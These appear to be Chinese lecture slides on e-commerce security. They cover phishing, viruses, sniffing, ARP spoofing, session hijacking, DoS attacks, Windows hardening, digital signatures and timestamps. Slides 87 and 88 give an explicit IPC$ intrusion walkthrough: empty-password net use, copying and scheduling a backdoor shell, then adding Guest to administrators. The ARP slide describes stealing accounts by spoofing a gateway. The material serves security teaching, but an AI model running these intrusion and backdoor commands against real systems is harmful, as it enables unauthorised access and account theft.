电子商务安全威胁-钓鱼网站 所谓“钓鱼网站”是一种网络欺诈行为,指不法分子利用各种手段,仿冒真实网站的URL地址以及页面内容,或者利用真实网站服务器程序上的漏洞在站点的某些网页中插入危险的HTML代码,以此来骗取用户银行或信用卡账号、密码等私人资料。 钓鱼网站通常伪装成为银行网站,窃取访问者提交的账号和密码信息。它一般通过电子邮件传播,此类邮件中一个经过伪装的链接将收件人联到钓鱼网站。 钓鱼网站的页面与真实网站界面完全一致,要求访问者提交账号和密码。一般来说钓鱼网站结构很简单,只有一个或几个页面,URL和真实网站有细微差别。 应该特别小心由不规范的字母数字组成的CN类网址,最好禁止浏览器运行JavaScript和ActiveX代码,不要上一些不太了解的网站。 钓鱼网站 目录[隐藏] 网站定义 危害方式 鉴别方法 专家建议 [编辑本段] 所谓“钓鱼网站”是一种网络欺诈行为,指不法分子利用各种手段,仿冒真实网站的URL地址以及页面内容,或者利用真实网站服务器程序上的漏洞在站点的某些网页中插入危险的HTML代码,以此来骗取用户银行或信用卡账号、密码等私人资料。 “钓鱼网站”近来在全球频繁出现,严重地影响了在线金融服务、电子商务的发展,危害公众利益,影响公众应用互联网的信心。钓鱼网站通常伪装成为银行网站,窃取访问者提交的账号和密码信息。它一般通过电子邮件传播,此类邮件中一个经过伪装的链接将收件人联到钓鱼网站。钓鱼网站的页面与真实网站界面完全一致,要求访问者提交账号和密码。一般来说钓鱼网站结构很简单,只有一个或几个页面,URL和真实网站有细微差别。 专家提醒,网民在查找信息时,应该特别小心由不规范的字母数字组成的CN类网址,最好禁止浏览器运行JavaScript和ActiveX代码,不要上一些不太了解的网站。 最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。这些个人信息对黑客们具有非常大的吸引力,因为这些信息使得他们可以假冒受害者进行欺诈性金融交易,从而获得经济利益。受害者经常遭受显著的经济损失或全部个人信息被窃取并用于犯罪的目的。 网络钓鱼其实就是网络上众多诱骗手法之中的一种,由于它的手段基本就是通过网络用一些诱饵(比如假冒的网站)等使用者上当,很像现实生活中的钓鱼过程,所以就被称之为“网络上的钓鱼”。它的最大危害就是会窃取用户银行卡的帐号、密码等重要信息,使用户受到经济上的损失。 网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATMPIN码或信用卡详细信息)的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。这些个人信息对黑客们具有非常大的吸引力,因为这些信息使得他们可以假冒受害者进行欺诈性金融交易,从而获得经济利益。 国内现有处理机制都难以有效制止。对“网络钓鱼”的诈骗行为,工信部和公安部都设有专门的监管机构。其他各大部委也都有专门的监管机构负责行业内的网络安全管理。但由于“钓鱼网站”频繁出现,现有的处理机制很难及时有效制止“钓鱼网站”,在“中国反钓鱼网站联盟”成立前,国内还没有建立专门协调此问题的组织。 “中国反钓鱼网站联盟”成员单位包括:工商银行、农业银行、中国银行、建设银行、华夏银行、光大银行、银河证券、腾讯、淘宝、支付宝等几十家金融机构和电子商务网站,以及中国万网、中企动力、厦门中资源、厦门华商盛世、阿里巴巴、ChinaSpringboardInc.等国内主要的域名注册服务机构。“中国反钓鱼网站联盟”并非官方机构,它的成员包括了域名管理机构、注册服务机构,以及银行证券类、电子商务类、网络安全类等企业,目的就是为了发现和治理“钓鱼网站”,主要是针对假冒其成员单位的“钓鱼网站”。该联盟在接到涉及联盟成员的投诉后,权威技术鉴定机构会立即对其进行判定,一经认定,两个小时内暂停其域名解析,终止欺诈行为。从处理的及时性上大大降低了“钓鱼网站”所造成的危害。联盟的成员单位目前还是有限,对于层出不穷的“钓鱼网站”,国内反钓鱼网站协调机制和反钓鱼网站综合治理体系的建设还需进一步推进。另外,国家有关的法律法规也有待进一步完善[1]。 钓鱼在大多数情况下是关于你的银行账号、密码、信用卡资料、社会保障卡号以及你的电子货币帐户信息。关于用户的paypal、yahoo邮件、gmail及其他免费邮件服务。只要记住上述那些正式公司绝不会通过电子邮件让你提供任何信息。如果你收到类似要求,让你提供资料,或者在邮件中带有指向网站的链接,那么它一定是网络钓鱼诈骗。 从不点击电子邮件中的链接来输入你的登录信息或者密码。相反,如果你认为电子邮件可能是合法的,那么用你的Internet浏览器或者Netscape浏览器直接访问公司网站。(不要从一封可疑的电子邮件中复制粘贴url地址。) 总是使用公司的官方网站来提交个人信息。如果在线发送信息,那么应该使用一个安全服务器在公司的官方网站上操作。 如果还是怀疑电子邮件所说的,就给公司打个电话。 总是在你的手机或者笔记本中保存你经常打交道的公司的正确联系电话号码,并且只使用你保存的那个号码。例如,如果你在汇丰银行有一个账户,那么保存正确联系号码,并且只使用那个号码。永远也不要相信邮件中的电话号码。 像电话号码一样,总是在你的收藏夹中保存正确的网站地址,并且使用他们做与那个公司有关的任何事情,永远也不要相信电子邮件中的网站链接。
66
3. 计算机病毒发作现象 机器不能正常启动 运行速度降低 内存空间迅速变小 文件内容和长度有所改变 经常出现“死机”现象 外部设备工作异常
3. 计算机病毒发作现象 机器不能正常启动 运行速度降低 内存空间迅速变小 文件内容和长度有所改变 经常出现“死机”现象 外部设备工作异常 … …
67
4. 计算机病毒入侵方式 1) 社会工程(利用地震、奥运等热点话题建立欺诈网站) 2) 垃圾邮件 3) 恶意网页(网页挂马)
4. 计算机病毒入侵方式 1) 社会工程(利用地震、奥运等热点话题建立欺诈网站) 2) 垃圾邮件 3) 恶意网页(网页挂马) 4) 利用系统漏洞和第三方软件 5) 即时通讯工具(MSN、QQ等) 6) 文件下载(P2P 软件) 7)局域网 8)优盘等移动存储介质 9)文件感染 10)分步式入侵 11) 无线网络
68
5. 计算机病毒防范措施 修补操作系统以及其捆绑的软件的漏洞: 安装并及时更新杀毒软件与防火墙产品 不要点来路不明连接以及运行不明程序
69
网络入侵与攻击
70
网络入侵与攻击 黑客:黑客一词,原指热心于计算机技术,水平高超的电脑专家,尤其是程序设计人员。但到了今天,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的人。
71
入侵技术的发展 工具 高 入侵者水平 攻击者 攻击手法 1980 1985 1990 1995 2000 2002
半开放隐蔽扫描 高 包欺骗 拒绝服务 DDOS 攻击 入侵者水平 嗅探 www 攻击 擦除痕迹 自动探测扫描 GUI远程控制 后门 破坏审计系统 检测网络管理 会话劫持 控制台入侵 Here’s a graphical way of looking at the exponential growth of threats over a ten year period. 10 years ago the threats were simple file-based viruses Then we saw growing complexity, with mass mailers that spread in hours. In early 2000 we saw the first major DOS attacks And now we’re seeing a new kind of blended threat. The blended threat combines an arsenal of tricks to do damage. They require a very comprehensive portfolio of security solutions. More on this later. In short, we are way, way past the days when AV was enough to secure a system. 利用已知的漏洞 密码破解 攻击者 攻击手法 可自动复制的代码 密码猜测 1980 1985 1990 1995 2000 2002
72
入侵系统的常用步骤 提 升 为 最 高 权 限 采用 漏洞 扫描 工具 选择 会用 的 方式 入侵 获取 系统 一定 权限 获取敏感信息
或者 其他攻击目的 安装 系统 后门
73
较高明的入侵步骤 判断 系统 攻击其 他系统 提 升 为 最 高 权 限 选择 最简 方式 入侵 获取 系统 一定 权限 安装 多个 系统
后门 清除 入侵 脚印 端口 判断 获取敏 感信息 分析 可能 有漏 洞的 服务 作为其 他用途
74
2001年中美黑客大战 事件背景和经过 4.1撞机事件为导火线
4月初,以PoizonB0x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改 4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了 “五一卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。 各方都得到第三方支援 各大媒体纷纷报道,评论,中旬结束大战
75
PoizonB0x、pr0phet更改的网页
国内某大型商业网站 国内某政府网站 中国科学院心理研究所 中经网数据有限公司
76
国内黑客组织更改的网站页面 美国某大型商业网站 美国某政府网站 美国劳工部网站 美国某节点网站
中新网6月17日电在16日早上,英国执政党工党的官方网站上的最新消息不见了,取而代之的美国总统布什抱着一头狗的图片,而狗的头部被贴上了英国首相布莱尔的相片。有关图片直到英国时间早上9点45分才被移去。 抗非典网站乱码。
77
这次事件中采用的常用攻击手法 红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下: “我们更多的是一种不满情绪的发泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统, 这个行动在技术上是没有任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击
78
这次事件中被利用的典型漏洞 用户名泄漏,缺省安装的系统用户名和密码 获得用户名 和简单密码 利用黑客工具 扫描系统用户 入侵者
79
这次事件中被利用的典型漏洞 Windows 2000登录验证机制可被绕过
80
常见的安全攻击方法 直接获取口令进入系统:网络监听,暴力破解 利用系统自身安全漏洞
特洛伊木马程序:伪装成工具程序或者游戏等诱使用户打开或下载,然后使用户在无意中激活,导致系统后门被安装 WWW欺骗:诱使用户访问纂改过的网页 电子邮件攻击:邮件炸弹、邮件欺骗 网络监听:获取明文传输的敏感信息 通过一个节点来攻击其他节点:攻击者控制一台主机后,经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据 拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S)
81
获取信息 1. 收集主机信息 应用的方法: IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。
1. 收集主机信息 IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。 应用的方法: Ping命令判断计算机是否开着,或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息
83
2.端口扫瞄 获取网络服务的端口作为入侵通道。
84
扫瞄软件举例: NSS(网络安全扫描器),可执行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常规检查。 Strobe(超级优化TCP端口检测程序),可记录指定机器上的所有开放端口,快速识别指定机器上运行的服务,提示可以被攻击的服务。 SATAN(安全管理员的网络分析工具),SATAN用于扫描远程主机,发现漏洞,包括FTPD漏洞和可写的FTP目录,NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。 Jakal扫描器,可启动而不完成TCP连接,因此可以扫描一个区域而不留下痕迹。 IdengTCPscan扫描器,可识别指定TCP端口的进程的UID。
86
3.Sniffer扫瞄 原理: sniffer类的软件能把本地网卡设置成工作在“混杂” (promiscuous)方式,使该网卡能接收所有数据帧,从而获取别人的口令、金融帐号或其他敏感机密信息等。 方法与对策: 1、用交换机替换HUB,交换机是两两接通,比普通HUB安全。 2、使用检测的软件,如CPM Antisniff等,检测网络中是否有网卡工作在混杂状态(基本原理是发送本网中并不存在的MAC((Media Access Control)地址,看看是否有回应,如有回应,则说明有计算机网卡工作在混杂模式。)。 adj.(尤指)性关系随便的;混杂的;随便的;淫乱
87
一次利用ipc$的入侵过程 1. C:\>net use \\x.x.x.x\IPC$ “” /user:“admintitrators” 用《流光》扫到的用户名是administrators,密码为“空”的IP地址 2. C:\>copy srv.exe \\x.x.x.x\admin$ 先复制srv.exe上去,在流光的Tools目录下 3. C:\>net time \\x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00,命令成功完成。 4. C:\>at \\x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:\>net time \\x.x.x.x 再查查时间到了没有,如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05,那就准备开始下面的命令。 6. C:\>telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 admin$,就是访问你的x:\windows\system32目录 IPC(Inter-Process Communication)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
88
一次利用ipc$的入侵过程 7.C:\>copy ntlm.exe \\ \admin$ ntlm.exe也在《流光》的Tools目录中 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>是在对方计算机上运行.当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了 为了方便日后登陆,将guest激活并加到管理组 10. C:\>net user guest /active:yes 11. C:\>net user guest 将Guest的密码改为 C:\>net localgroup administrators guest /add 将Guest变为Administrator
89
网络监听及防范技术 网络窃听是指通过截获他人网络上通信的数据流,并非法从中提取重要信息的一种方法 间接性
利用现有网络协议的一些漏洞来实现,不直接对受害主机系统的整体性进行任何操作或破坏 隐蔽性 网络窃听只对受害主机发出的数据流进行操作,不与主机交换信息,也不影响受害主机的正常通信
90
网络监听及防范技术 共享式局域网采用的是广播信道,每一台主机所发出的帧都会被全网内所有主机接收到
一般网卡具有以下四种工作模式:广播模式、多播模式、直接模式和混杂模式 网卡的缺省工作模式是广播模式和直接模式,即只接收发给自己的和广播的帧 网卡从网络上接收到目标物理地址对应的所有bit位都为1的数据报时,会收到这条消息并将其上传给驱动程序,网卡的这种工作模式称为广播模式,网卡的缺省工作模式包含直接模式和广播模式。 “多播”亦称“多点传送”(multicast),也就是一台主机发出的包可以同时被其他多个有资格的主机接收,这台主机和那些有资格的主机就形成了一个组,他们在组内的通信是广播式的。多播的工作原理是,将一个网络上的某些主机的网卡设置成多播传送工作模式,指定其不过滤以某一个多播传送地址作为目的物理地址的数据帧,这样,这些主机的驱动程序中就可以同时接收以该多播传送地址作为目的物理地址的数据帧,而其他主机的驱动程序却接收不到,这些主机在逻辑上便形成了一个“多播”组。采用这种技术,相对广播而言,可有效减轻网络上“多播”组之外的其他主机的负担,因为发送给“多播”组的数据不会被传送到它们的驱动程序中去处理,避免资源的无谓浪费。最开始的时候,设计这一技术的目的是弥补“广播”(Broadcasting)通信的不足。
91
网络监听及防范技术 使用MAC地址来确定数据包的流向 若等于自己的MAC地址或是广播MAC地址,则提交给上层处理程序,否则丢弃此数据
当网卡工作于混杂模式的时候,它不做任何判断,直接将接收到的所有帧提交给上层处理程序 共享式网络下窃听就使用网卡的混杂模式 MAC的广播地址是48位全1,即第一个FF-FF-FF-FF-FF-FF
92
网络监听及防范技术
93
网络监听及防范技术 在数据链路层,数据帧的目的地址是以网卡的MAC地址来标识 ARP协议实现<IP—MAC>的配对寻址
ARP请求包是以广播的形式发出,正常情况下只有正确IP地址与的主机才会发出ARP响应包,告知查询主机自己的MAC地址。 局域网中每台主机都维护着一张ARP表,其中存放着<IP—MAC>地址对。
94
ARP改向的中间人窃听 网络监听及防范技术 A发往B:(MACb,MACa, PROTOCOL,DATA)
B发往A:(MACa,MACb, PROTOCOL,DATA) A发往B:(MACx,MACa, PROTOCOL,DATA) B发往A:(MACx,MACb, PROTOCOL,DATA)
95
X分别向A和B发送ARP包,促使其修改ARP表
网络监听及防范技术 X分别向A和B发送ARP包,促使其修改ARP表 主机A的ARP表中B为<IPb—MACx> 主机B的ARP表中A为<IPa—MACx> X成为主机A和主机B之间的“中间人”
96
ARP改向--协议欺骗攻击 网关 受害者 攻击者
ARP欺骗的起因: 网络游戏兴起后网络盗号,木马也跟着疯狂。ARP欺骗就是一种很好的盗号方式。欺骗者利用自己在网吧上网时,先找到内网网关的MAC地址,然后发送自己ARP欺骗,告送内网所有的机器自己是网关。例如:192。168。1。55 MAC c a 机器为欺骗者的盗号机器,首先,他会先找到内网的网关(内网网关为 192。168。1。1 MAC为XX.XX.XX.XX.XX.XX)。之后他就会发送ARP广播,说自己的IP地址是192。168。1。1 MAC地址是 c a.这样,内网的所有收到他发信息得机器都会把它误认为内网的网关。所有上网信息都会通过他的MAC地址发给这个机器,由于找不到真正的网关,这些被骗的机器就无法上网。而发送的所有信息都会被这个盗号机器收到,通过分析收到的信息他可以在里面找到有用的信息,特别是有关于帐号的部分,从而得到正在游戏的玩家的帐号,发生盗号事件。 ARP的发现:ARP的通病就是掉线,在掉线的基础上可以通过以下几种方式判别,1。一般情况下不需要处理1分钟之内就可以回复正常上网。因为ARP欺骗是由时限,过了期限就会自动的回复正常。而且现在大多数路由器都会在很短时间内不停广播自己的正确ARP,使受骗的机器回复正常。但是如果出现攻击性ARP欺骗(其实就是时间很短的量很大的欺骗ARP,1秒有个几百上千的),他是不断的通过非常大量ARP欺骗来阻止内网机器上网,即使路由器不断广播正确的包也会被他大量的错误信息给淹没。2。打开被骗机器的DOS界面,输入ARP -A命令会看到相关的ARP表,通过看到的网关的MAC地址可以去判别是否出现ARP欺骗,但是由于时限性,这个工作必须在机器回复正常之前完成。如果出现欺骗问题,ARP表里面会出现错误的网关MAC地址,和真实的网关MAC一对黑白立分. 攻击者
97
网络窃听的被动防范 分割网段 细化网络会使得局域网中被窃听的可能性减小 使用静态ARP表 手工输入<IP—MAC>地址对
98
IP欺骗及防范技术——会话劫持 一般欺骗 会话劫持
99
会话劫持攻击的基本步骤 发现攻击目标 确认动态会话 猜测序列号(TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号 )
IP欺骗及防范技术——会话劫持 会话劫持攻击的基本步骤 发现攻击目标 确认动态会话 猜测序列号(TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号 ) 关键一步,技术难点 使被冒充主机下线 伪造FIN包,拒绝服务攻击 接管会话
100
IP欺骗及防范技术——会话劫持 猜测序列号 TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号
选择恰当时间,在数据流中插入一个欺骗包,服务器将接受这个包,并且更新ACK序列号;然而客户主机仍继续使用老的SEQ序列号,而没有察觉我们的欺骗包
101
IP欺骗及防范技术——防范技术 没有有效的办法可以从根本上防范会话劫持攻击 所有会话都加密保护——实现困难 使用安全协议(SSH、VPN)——保护敏感会话
102
口令攻击 方法与对策: 1、限制同一用户的失败登录次数 2、限制口令最短长度,要求特权指令使用复杂的字母、数字组合。
1 口令暴力攻击: 生成口令字典,通过程序试探口令。 2 窃取口令文件后解密: 窃取口令文件(UNIX环境下的Passwd文件和Shadow文件) ,通过软件解密。 方法与对策: 1、限制同一用户的失败登录次数 2、限制口令最短长度,要求特权指令使用复杂的字母、数字组合。 3、定期更换口令,不要将口令存放到计算机文件中
103
拒绝服务攻击(DoS) 为何还没回应 就是让你白等 伪造地址进行SYN请求 攻击者 不能建立正常的连接 受害者 SYN (我可以连接吗?)
ACK (可以)/SYN(请确认!) 攻击者 受害者 伪造地址进行SYN请求 为何还没回应 就是让你白等 不能建立正常的连接
104
拒绝服务攻击 利用系统缺陷攻击 OOB攻击 耗尽连接攻击 利用放大原理 Smurf攻击 利用放大系统攻击 分布式拒绝服务攻击DDoS
105
1. OOB攻击(Out of Band) 原理: 攻击者是利用Windows下微软网络协定NetBIOS的一个例 外处理程序OOB(Out of Band)的漏洞。只要有人以OOB的 方式,通过TCP/IP传递一个小小的包到某个IP地址的某个开放 的受端上(一般为139)。 对象:使没有防护或修订的win95/nt系统瞬间当机。 工具: Ssping、Teardrop(泪滴)、Trin00、Targe3 对策 这些攻击都是利用系统的漏洞,因此补救的办法是升级或下载补丁
106
2. 耗尽连接攻读 LAND攻击:向被攻击者发送一个个源地址和目标地址都被设 置成为被攻击者的地址的SYN包,导致被攻击者自己与自己建立 一个空连接,直到超时。 TCP/SYN攻击:攻击者向目标主机不断发送带有虚假源地址 的SYN包,目标主机发送ACK/SYN回应,因为源地址是虚假的, 所以不会收到ACK回应,导致耗费大量资源等待ACK上,直止 系统资源耗尽。 对策 这些攻击都是利用系统的漏洞,因此补救的办法是升级或下载补丁
107
Smurf攻击 Smurf攻击原理 攻击者用广播的方式发送回复地址为受害者地址的ICMP请求数据包,每个收到这个数据包的主机都进行回应,大量的回复数据包发给受害者,导致受害主机崩溃。
108
利用放大系统攻击 某些类型的操作系统,在一定情况下,对一个请求所返回的信息比请求信息量大几十倍(如Macintosh),攻击者伪装成目标主机进行请求,导致大量数据流发向目标主机,加重了攻击效果。
109
Netstat命令 许多程序使用固定的端口,可以扫描整个的网络监测可疑的活动。 简单方法 netstat -an
110
常见的安全防范措施
111
常用的安全防护措施-防火墙 访问控制 认证 加密 防病毒、内容过滤 流量管理
112
漏洞扫描系统 地方网管 地方网管 地方网管 地方网管 Internet 地方网管 监控中心 scanner
113
系统安全加固 基本安全配置检测和优化 密码系统安全检测和增强 系统后门检测 提供访问控制策略和工具 增强远程维护的安全性 文件系统完整性审计
增强的系统日志分析 系统升级与补丁安装
114
Windows系统安全加固 使用Windows update安装最新补丁;
更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全; 卸载不需要的服务; 将暂时不需要开放的服务停止; 限制特定执行文件的权限; 设置主机审核策略; 调整事件日志的大小、覆盖策略; 禁止匿名用户连接; 删除主机管理共享; 限制Guest用户权限; 安装防病毒软件、及时更新病毒代码库; 安装个人防火墙。
115
Windows系统安全加固 使用Windows update安装最新补丁;
更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全; 将默认Administrator用户和组改名,禁用Guests并将Guest改名; 开启安全审核策略; 卸载不需要的服务; 将暂时不需要开放的服务停止; 限制特定执行文件的权限; 调整事件日志的大小、覆盖策略; 禁止匿名用户连接; 删除主机管理共享; 安装防病毒软件、个人防火墙。
116
优化注册表增强安全性 限制空连接 限制来宾和空登陆身份查看事件日志
HKEY_Local_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters 键值: RestrictNullSessAccess 类型: REG_DWORD 数值: 1 限制来宾和空登陆身份查看事件日志 HKEY_Local_MACHINE\System\CurrentControlSet\Services\EventLog\Application Security System 键值:RestrictGuestAccess 类型:REG_DWORD 数值:1
117
优化注册表增强安全性 限制服务器显示在网络列表中 审核备份还原时间
HKEY_Local_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters 键值: hidden 类型: REG_DWORD 数值: 1 审核备份还原时间 HKEY_Local_MACHINE\System\CurrentControlSet\Control\Lsa 键值:FullPrivilegeAuditng 类型:REG_DWORD 数值:1
118
优化注册表增强安全性 不显示最后登陆名 限制匿名用户列举用户和共享信息
HKEY_Local_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon 键值: DontDisplayLastUserName 类型: REG_SZ 数值: 1 限制匿名用户列举用户和共享信息 HKEY_Local_MACHINE\System\CurrentControlSet\Control\Lsa 键值:RestrictAnonymous 类型:REG_DWORD 数值:1
119
数字签名技术 所谓“数字签名”就是通过生成一系列符号及代码组成电子密码进行签名,来代替书写签名或印章。 通过数字签名能确认/功能:
(1)信息是由哪位签名者发送的; (2)保证数据传输的完整性和不可否认性。 1 6 7 2 4 3 5 7、如果消息摘要1和消息摘要2两者一致,则说明在传送过程中信息没有破坏和篡改, 否则说明信息已经失去安全性和保密性。 5. 利用发送者的公钥对数字签名进行解密,形成消息摘要2; 6. 接收者对收到的明文消息进行处理,获得消息摘要1; 2. 发送方将发送消息加密,产生消息摘要; 1. 发送方产生一个原文消息; 3. 发送方用自己的私钥对摘要加密,形成数字签名; 4. 经过加密的信息通过internet送到接受者;
120
数字时间戳 在各种政务和商务文件中,时间是十分重要的信息。在书面合同中,文件签署的日期和签名一样均是十分重要的防止文件被伪造和篡改的关键性内容。 在电子文件中,同样需对文件的日期和时间信息采取安全措施,而数字时间戳服务(DTS:digital time-stamp service)就能提供电子文件发表时间的安全保护。 数字时间戳服务(DTS)是网上安全服务项目,由专门的机构提供。时间戳(time-stamp)是一个经加密后形成的凭证文档,它包括三个部分: ① 需加时间戳的文件的摘要 (digest); ② DTS收到文件的日期和时间; ③ DTS的数字签名。
121
数字时间戳 时间戳服务工作流程: ◆ 用户对文件数据进行Hash摘要处理; ◆ 用户提出时间戳的请求,Hash值被传递给时间戳服务器; ◆ 时间戳服务器对哈希值和一个日期/时间记录进行签名,生成时间戳; ◆ 时间戳数据和文件信息绑定后返还,用户进行下一步电子交易操作。 用户申请时间戳时,创作者通过互联网上传的仅仅是文件的“指纹”(HASH值),系统只是对文件的“指纹”进行时间戳签名,并不能浏览到文件的内容,从而保证了用户原始信息数据的保密性和安全性。 注意:书面签署文件的时间是由签署人自己写上的,而数字时间戳则不然,它是由认证单位DTS来加的,以DTS收到文件的时间为依据。因此,时间戳也可作为科学家的科学发明文献的时间认证。
122
WoSign电子商务时间戳服务 不仅可以查看签名人的签名证书所有信息,还可以查看反签名人信息,也就是时间戳服务签名信息以及反签名证书信息,反签名人:WoSign Time Stamping Signer。这样,用户才会确信此文件确实是来自签名人和签名时的时间,因为签名人的真实身份是通过权威的第三方 WoSign 认证的。深圳市沃通电子商务服务有限公司 ( WoSign eCommerce Services Ltd. ) 是一家由留学美国和英国的 留学归国人员 创办的高科技企业,深圳市留学生创业园孵化企业,创立于 2002 年 3 月,自成立以来充分利用海外留学优势,一直在不断消化 、吸收和引进国外先进的计算机网络通信技术来服务中国企业和个人。公司在发展过程中,公司不断根据市场的需求,成功研发和引进出一系列有巨大市场需求的技术含量高的创新产品,并已经向中国知识产权局、美国专利与商标局和世界知识产权组织申请多项发明专利,从而保护了公司投资人和公司客户的长远利益。美国 WoSign, Inc. 成立于 2004 年,全面负责公司高端技术研发和融资工作。 公司 CEO 兼 CTO 王高华 先生 曾担任 深圳市信息网络中心 总工程师多年, 了解硅谷最新科技,通晓中西方文化差异, 多次赴美国接受技术培训和参加有关国际会议,为网络通信领域国家级技术专家,拥有多项专利技术,并经常为《计算机世界》和《中国计算机报》等报刊撰写技术文章。 王高华 先生带领管理团队成功摸索出一条适合企业发展的网络营销新路子,确保 WoSign 没有市场销售部而销售额年年有 100% 以上的快速增长,短短 5 年多时间 ( ) 从零到占领中国数字证书市场 70% 以上的市场份额。 公司历史(History): • 2002年3月:公司成立,先后开发了一些新产品,但由于投资大而放弃; • 2004年4月: 先后代理 GeoTrust 、Thawte 和 VeriSign 全系列数字证书产品; • 2006年10月:推出自有品牌 WoTrust全系列数字证书产品; • 2007年5月:推出新品牌 WoSign 全系列数字证书产品; • 2007年7月: WoSign 成为 TC TrustCenter 指定的 TC Publisher ID证书在中国的唯一销售代理商和唯一辅助身份验证机构; • 2008年10月: WoSign 停止销售代理某些品牌产品,决定专注自主品牌产品; • 2009年10月: WoSign停止销售代理 TC TrustCenter 的 TC Publisher ID 证书,进一步坚定走自主品牌产品路线; • 2009年12月:推出全球可信数字身份认证服务和相关产品,让数字证书产品在电子商务国际贸易上发挥更重要的作用; • 2010 年1月:公司网站成功改版,明确 公司使命:建立在线信任 和 保障在线安全。
123
数字水印技术 数字水印(Digital Watermarking)技术是将一些标识信息(即数字水印)直接嵌入数字载体(包括多媒体、文档、软件等)当中,但不影响原载体的使用价值,也不容易被人的知觉系统(如视觉或听觉系统)觉察或注意到。 通过这些隐藏在载体中的信息,可以达到确认内容创建者、购买者、传送隐秘信息或者判断载体是否被篡改等目的。
124
关于电子商务安全防护知识……
125
信用卡安全问题 信用卡的安全问题主要分为下述五大方面:
信用卡:不法分子以假卡或废卡(过期/遗失作废/磁带损毁...等)冒充正卡消费,直接蒙骗商家或甚发卡机构。 持卡人:卡片保管不善/处理不当(过期/磁带失效的信用卡未迳行销毁,或遗失未立即作废等),以及个人身份信息无意之间遭窃取或骗取。 为避免此类问题发生,公民不要轻易对外提供个人身份信息,最好也不要委托别人代办信用卡。 消费商家:服务人员于持卡人消费过程超刷,或窃取其信用卡资讯至其他商家消费。 发卡机构:电脑系统遭恶意入侵,窃取客户基本/交易资讯。 交易系统与机制:再严谨的交易机制,配合从确认到结算的世界级交易系统,仍然有被入侵的可能。
126
IC卡(Integrate Circuit)
IC卡是指集成电路卡,我们一般用的公交车卡就是IC卡的一种,一般常见的IC卡采用射频技术RF(Radio Frequency)与IC卡的读卡器进行通讯。 IC卡与磁卡是有区别的,IC卡是通过卡里的集成电路存储信息,而磁卡是通过卡内的磁记录信息。IC卡的成本一般比磁卡高,但保密性更好。 IC卡的存储容量根据型号不同,小的几百个字符,大的上百万个字符。 按照应用领域来划分,IC卡可以分为金融卡和非金融卡两种。金融卡又分为信用卡和现金储值卡;非金融卡是指应用于医疗、通信、交通等非金融领域的IC卡。 按照IC卡与读卡器的通信方式,可将IC卡分为接触式IC卡和非接触式IC卡两种。 接触式IC卡通过卡片表面8个金属触点与读卡器进行物理连接来完成通信和数据交换。 非接触式IC卡通过无线通信方式与读卡器进行通信,通信时非接触IC卡不需要与读卡器直接进行物理连接。 目前的银行卡大多数仍为磁卡,在塑料卡片上有磁条和凸印字。磁条中记录账号和密码等基本信息,而实际款项存储在由网络连接的银行计算机硬盘上。用户提取或存入的款项在不同的银行账户之间进行资金往来。用户消费的款项由银行和商户之间进行结转和清算。这种磁卡在使用时需要访问主机账户,因此只能在联机处理时间内使用,其速度和稳定性取决于通信线路的质量,在网络达不到的场所则无法使用。 非接触式 ic卡全称集成电路卡(integrated circuit card),又称智能卡(smart card)。可读写,容量大,有加密功能,数据记录可靠,使用更方便,如一卡通系统、消费系统等,目前主要有philips的mifare系列卡。 感应式id卡全称身份识别卡(identification card),是一种不可写入的感应卡,含固定的编号,主要有台湾syris的em格式、美国hid、ti、motorola等各类id卡。 